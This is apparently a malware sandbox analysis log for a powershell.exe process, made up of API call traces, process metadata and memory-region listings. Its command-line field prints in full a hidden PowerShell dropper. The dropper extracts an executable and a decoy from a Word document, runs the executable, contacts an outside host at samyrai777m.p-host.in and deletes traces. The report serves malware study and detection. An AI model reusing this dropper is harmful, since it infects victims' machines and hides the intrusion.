[0082.193] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.193] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.194] CoTaskMemFree (pv=0x22a1f0)
[0082.203] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.203] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.203] CoTaskMemFree (pv=0x22a1f0)
[0082.203] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a8
[0082.203] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x358
[0082.203] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x37c
[0082.203] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x380
[0082.203] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x384
[0082.203] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x388
[0082.203] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x38c
[0082.203] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x390
[0082.203] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3ac
[0082.203] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x378
[0082.204] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x398
[0082.204] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x39c
[0082.204] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.204] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.204] CoTaskMemFree (pv=0x22a1f0)
[0082.205] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0082.205] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x10d6e0 | out: lpMode=0x10d6e0) returned 1
[0082.205] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.205] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.205] CoTaskMemFree (pv=0x22a1f0)
[0082.206] SetEvent (hEvent=0x380) returned 1
[0082.206] SetEvent (hEvent=0x3a8) returned 1
[0082.207] SetEvent (hEvent=0x358) returned 1
[0082.207] SetEvent (hEvent=0x37c) returned 1
[0082.207] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x30c
[0082.208] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.208] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.208] CoTaskMemFree (pv=0x22a1f0)
[0082.208] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d438 | out: phkResult=0x10d438*=0x310) returned 0x0
[0082.208] RegQueryValueExW (in: hKey=0x310, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x10d3bc, lpData=0x0, lpcbData=0x10d3b8*=0x0 | out: lpType=0x10d3bc*=0x0, lpData=0x0, lpcbData=0x10d3b8*=0x0) returned 0x2
[0083.675] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0083.675] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0083.675] CoTaskMemFree (pv=0x22a1f0)
[0083.680] SetEvent (hEvent=0x320) returned 1
[0083.688] CoTaskMemAlloc (cb=0x804) returned 0x1b7adc70
[0083.688] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7adc70, nSize=0x10d568 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x10d568) returned 0x1
[0083.688] CoTaskMemFree (pv=0x1b7adc70)
[0083.688] CoTaskMemAlloc (cb=0x204) returned 0x1c3660
[0083.688] GetUserNameW (in: lpBuffer=0x1c3660, pcbBuffer=0x10d5a8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x10d5a8) returned 1
[0083.688] CoTaskMemFree (pv=0x1c3660)
[0083.689] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3003f00*="Stopped", lpRawData=0x3003c90) returned 1
[0083.690] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1
[0083.691] CoGetContextToken (in: pToken=0x10f130 | out: pToken=0x10f130) returned 0x0
[0083.691] CObjectContext::QueryInterface () returned 0x0
[0083.691] CObjectContext::GetCurrentThreadType () returned 0x0
[0083.691] Release () returned 0x0
[0083.692] CoGetContextToken (in: pToken=0x10ed00 | out: pToken=0x10ed00) returned 0x0
[0083.692] CObjectContext::QueryInterface () returned 0x0
[0083.692] CObjectContext::GetCurrentThreadType () returned 0x0
[0083.692] Release () returned 0x0
[0083.693] CoGetContextToken (in: pToken=0x10ed00 | out: pToken=0x10ed00) returned 0x0
[0083.693] CObjectContext::QueryInterface () returned 0x0
[0083.693] CObjectContext::GetCurrentThreadType () returned 0x0
[0083.693] Release () returned 0x0
[0083.722] CoGetContextToken (in: pToken=0x10ed00 | out: pToken=0x10ed00) returned 0x0
[0083.722] CObjectContext::QueryInterface () returned 0x0
[0083.722] CObjectContext::GetCurrentThreadType () returned 0x0
[0083.722] Release () returned 0x0
[0083.768] CoGetContextToken (in: pToken=0x10ecf0 | out: pToken=0x10ecf0) returned 0x0
[0083.768] CObjectContext::QueryInterface () returned 0x0
[0083.768] CObjectContext::GetCurrentThreadType () returned 0x0
[0083.768] Release () returned 0x0
[0083.769] CoUninitialize ()
Thread:
id = 90
os_tid = 0x610
Thread:
id = 93
os_tid = 0xa18
Thread:
id = 95
os_tid = 0xa08
Thread:
id = 98
os_tid = 0x99c
Thread:
id = 99
os_tid = 0x998
[0069.159] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0077.990] LocalFree (hMem=0x194640) returned 0x0
[0077.990] CloseHandle (hObject=0x324) returned 1
[0077.991] CloseHandle (hObject=0x13) returned 1
[0077.992] CloseHandle (hObject=0xf) returned 1
[0077.993] RegCloseKey (hKey=0x310) returned 0x0
[0077.993] RegCloseKey (hKey=0x30c) returned 0x0
[0077.993] RegCloseKey (hKey=0x308) returned 0x0
[0077.993] LocalFree (hMem=0x194610) returned 0x0
[0077.993] RegCloseKey (hKey=0x330) returned 0x0
[0080.925] RegCloseKey (hKey=0x374) returned 0x0
[0080.926] RegCloseKey (hKey=0x370) returned 0x0
[0080.926] RegCloseKey (hKey=0x36c) returned 0x0
[0080.926] RegCloseKey (hKey=0x368) returned 0x0
[0080.926] RegCloseKey (hKey=0x364) returned 0x0
[0080.926] RegCloseKey (hKey=0x360) returned 0x0
[0080.926] RegCloseKey (hKey=0x35c) returned 0x0
[0080.926] RegCloseKey (hKey=0x3a4) returned 0x0
[0080.927] RegCloseKey (hKey=0x3a0) returned 0x0
[0080.927] RegCloseKey (hKey=0x34c) returned 0x0
[0080.927] RegCloseKey (hKey=0x348) returned 0x0
[0080.927] RegCloseKey (hKey=0x344) returned 0x0
[0080.927] RegCloseKey (hKey=0x340) returned 0x0
[0080.927] RegCloseKey (hKey=0x33c) returned 0x0
[0080.928] RegCloseKey (hKey=0x338) returned 0x0
[0080.928] RegCloseKey (hKey=0x334) returned 0x0
[0080.928] RegCloseKey (hKey=0x310) returned 0x0
[0080.928] RegCloseKey (hKey=0x30c) returned 0x0
[0080.928] RegCloseKey (hKey=0x39c) returned 0x0
[0080.928] RegCloseKey (hKey=0x398) returned 0x0
[0080.928] RegCloseKey (hKey=0x378) returned 0x0
[0080.928] RegCloseKey (hKey=0x3ac) returned 0x0
[0080.929] RegCloseKey (hKey=0x390) returned 0x0
[0080.929] RegCloseKey (hKey=0x38c) returned 0x0
[0080.929] RegCloseKey (hKey=0x388) returned 0x0
[0080.929] RegCloseKey (hKey=0x384) returned 0x0
[0080.929] RegCloseKey (hKey=0x380) returned 0x0
[0080.929] RegCloseKey (hKey=0x37c) returned 0x0
[0080.930] RegCloseKey (hKey=0x358) returned 0x0
[0080.930] RegCloseKey (hKey=0x3a8) returned 0x0
[0080.930] RegCloseKey (hKey=0x308) returned 0x0
[0083.705] LocalFree (hMem=0x22a0e0) returned 0x0
[0083.706] LocalFree (hMem=0x229fd0) returned 0x0
[0083.722] DeregisterEventSource (hEventLog=0x1b880008) returned 1
[0083.764] CloseHandle (hObject=0x3a8) returned 1
[0083.764] RegCloseKey (hKey=0x310) returned 0x0
[0083.764] CloseHandle (hObject=0x30c) returned 1
[0083.764] CloseHandle (hObject=0x39c) returned 1
[0083.765] CloseHandle (hObject=0x398) returned 1
[0083.765] CloseHandle (hObject=0x378) returned 1
[0083.765] CloseHandle (hObject=0x3ac) returned 1
[0083.765] CloseHandle (hObject=0x390) returned 1
[0083.765] CloseHandle (hObject=0x38c) returned 1
[0083.765] CloseHandle (hObject=0x388) returned 1
[0083.766] CloseHandle (hObject=0x32c) returned 1
[0083.766] CloseHandle (hObject=0x384) returned 1
[0083.766] CloseHandle (hObject=0x380) returned 1
[0083.766] RegCloseKey (hKey=0xffffffff80000004) returned 0x0
[0083.766] CloseHandle (hObject=0x37c) returned 1
[0083.766] CloseHandle (hObject=0x2f0) returned 1
[0083.766] CloseHandle (hObject=0x320) returned 1
[0083.767] UnmapViewOfFile (lpBaseAddress=0x2860000) returned 1
[0083.767] CloseHandle (hObject=0x358) returned 1
Thread:
id = 108
os_tid = 0x94c
[0082.222] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0082.232] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409
[0082.245] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.245] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.245] CoTaskMemFree (pv=0x22a1f0)
[0082.246] VirtualQuery (in: lpAddress=0x1c76dd80, lpBuffer=0x1c76ec40, dwLength=0x30 | out: lpBuffer=0x1c76ec40*(BaseAddress=0x1c76d000, AllocationBase=0x1bde0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.284] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.284] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.284] CoTaskMemFree (pv=0x22a1f0)
[0082.285] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.285] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.285] CoTaskMemFree (pv=0x22a1f0)
[0082.287] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.287] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.287] CoTaskMemFree (pv=0x22a1f0)
[0082.308] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.308] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.308] CoTaskMemFree (pv=0x22a1f0)
[0082.324] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.324] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.324] CoTaskMemFree (pv=0x22a1f0)
[0082.325] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.325] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.325] CoTaskMemFree (pv=0x22a1f0)
[0082.335] VirtualQuery (in: lpAddress=0x1c76e030, lpBuffer=0x1c76eef0, dwLength=0x30 | out: lpBuffer=0x1c76eef0*(BaseAddress=0x1c76e000, AllocationBase=0x1bde0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.335] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.335] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.335] CoTaskMemFree (pv=0x22a1f0)
[0082.337] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.337] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.337] CoTaskMemFree (pv=0x22a1f0)
[0082.337] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.337] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.337] CoTaskMemFree (pv=0x22a1f0)
[0082.338] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.338] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.338] CoTaskMemFree (pv=0x22a1f0)
[0082.357] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.357] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.358] CoTaskMemFree (pv=0x22a1f0)
[0082.446] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.446] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.446] CoTaskMemFree (pv=0x22a1f0)
[0082.447] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.447] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.447] CoTaskMemFree (pv=0x22a1f0)
[0082.448] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.448] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.448] CoTaskMemFree (pv=0x22a1f0)
[0082.464] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.464] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.464] CoTaskMemFree (pv=0x22a1f0)
[0082.465] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.465] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.465] CoTaskMemFree (pv=0x22a1f0)
[0082.466] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.466] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.466] CoTaskMemFree (pv=0x22a1f0)
[0082.467] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.467] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.467] CoTaskMemFree (pv=0x22a1f0)
[0082.497] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.497] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.497] CoTaskMemFree (pv=0x22a1f0)
[0082.540] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.540] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.540] CoTaskMemFree (pv=0x22a1f0)
[0082.544] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.544] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x21
[0082.544] CoTaskMemFree (pv=0x22a1f0)
[0082.556] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.556] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x21
[0082.556] CoTaskMemFree (pv=0x22a1f0)
[0083.155] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\result.exex", nBufferLength=0x105, lpBuffer=0x1c76db30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\result.exex", lpFilePart=0x0) returned 0x2d
[0083.155] SetErrorMode (uMode=0x1) returned 0x1
[0083.155] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\result.exex" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\result.exex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffffffffffff
[0083.192] SetErrorMode (uMode=0x1) returned 0x1
[0083.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c76b440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0083.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c76b390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0083.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c76b390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0083.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c76b390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0083.323] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0083.323] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0083.323] CoTaskMemFree (pv=0x22a1f0)
[0083.657] SetEvent (hEvent=0x390) returned 1
[0083.657] SetEvent (hEvent=0x384) returned 1
[0083.657] SetEvent (hEvent=0x388) returned 1
[0083.657] SetEvent (hEvent=0x38c) returned 1
[0083.657] SetEvent (hEvent=0x39c) returned 1
[0083.657] SetEvent (hEvent=0x3ac) returned 1
[0083.657] SetEvent (hEvent=0x378) returned 1
[0083.657] SetEvent (hEvent=0x398) returned 1
[0083.657] SetEvent (hEvent=0x30c) returned 1
[0083.658] CoUninitialize ()
Process:
id = "9"
image_name = "powershell.exe"
filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
page_root = "0x3987a000"
os_pid = "0x2ac"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "4"
os_parent_pid = "0xbc0"
cmd_line = "\"C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe\" -WindowStyle Hidden Try{$ada=\"\"\"$env:APPDATA\\result.exe\"\"\";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf=\"\"\"$env:TEMP\\o.tmp\"\"\";taskkill /f /im winword.exe;Function pr{Try{$k=\"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\\StartupItems\\\"\"\";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path \"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\"\"\" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword \"\"\"$r\"\"\";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\\).Path;ri \"\"\"$cd\\*\"\"\" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;}"
cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\"
os_username = "YKYD69Q\\aETAdzjz"
os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010989" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1315
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1316
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1317
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1318
start_va = 0xf0000
end_va = 0x16ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 1319
start_va = 0x77800000
end_va = 0x779a8fff
entry_point = 0x77800000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1320
start_va = 0x7efe0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1321
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1322
start_va = 0x13f630000
end_va = 0x13f6a6fff
entry_point = 0x13f63c63c
region_type = mapped_file
name = "powershell.exe"
filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")
Region:
id = 1323
start_va = 0x7feffb20000
end_va = 0x7feffb20fff
entry_point = 0x7feffb20000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1324
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 1325
start_va = 0x7fffffdd000
end_va = 0x7fffffdefff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 1326
start_va = 0x7fffffdf000
end_va = 0x7fffffdffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdf000"
filename = ""
Region:
id = 1340
start_va = 0x220000
end_va = 0x31ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000220000"
filename = ""
Region:
id = 1341
start_va = 0x776e0000
end_va = 0x777fefff
entry_point = 0x776f5ea0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1342
start_va = 0x7fefd9d0000
end_va = 0x7fefda3afff
entry_point = 0x7fefd9d30e0
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1375
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1376
start_va = 0x20000
end_va = 0x2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1377
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1378
start_va = 0xc0000
end_va = 0xc6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 1379
start_va = 0xd0000
end_va = 0xd1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 1380
start_va = 0xe0000
end_va = 0xe2fff
entry_point = 0xe0000
region_type = mapped_file
name = "powershell.exe.mui"
filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui")
Region:
id = 1381
start_va = 0x170000
end_va = 0x170fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 1382
start_va = 0x180000
end_va = 0x180fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000180000"
filename = ""
Region:
id = 1383
start_va = 0x200000
end_va = 0x20ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 1384
start_va = 0x320000
end_va = 0x41ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000320000"
filename = ""
Region:
id = 1385
start_va = 0x420000
end_va = 0x5a7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000420000"
filename = ""
Region:
id = 1386
start_va = 0x5b0000
end_va = 0x730fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005b0000"
filename = ""
Region:
id = 1387
start_va = 0x740000
end_va = 0x1b3ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000740000"
filename = ""
Region:
id = 1388
start_va = 0x775e0000
end_va = 0x776d9fff
entry_point = 0x775fa2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1389
start_va = 0x7efe0000
end_va = 0x7f0dffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1390
start_va = 0x7f0e0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1391
start_va = 0x7fef1910000
end_va = 0x7fef197efff
entry_point = 0x7fef1911134
region_type = mapped_file
name = "mscoree.dll"
filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll")
Region:
id = 1392
start_va = 0x7fefbf10000
end_va = 0x7fefbf28fff
entry_point = 0x7fefbf10000
region_type = mapped_file
name = "atl.dll"
filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll")
Region:
id = 1393
start_va = 0x7fefdb40000
end_va = 0x7fefdb6dfff
entry_point = 0x7fefdb41010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1394
start_va = 0x7fefdd50000
end_va = 0x7fefddeefff
entry_point = 0x7fefdd525a0
region_type = mapped_file
name = "msvcrt.dll"
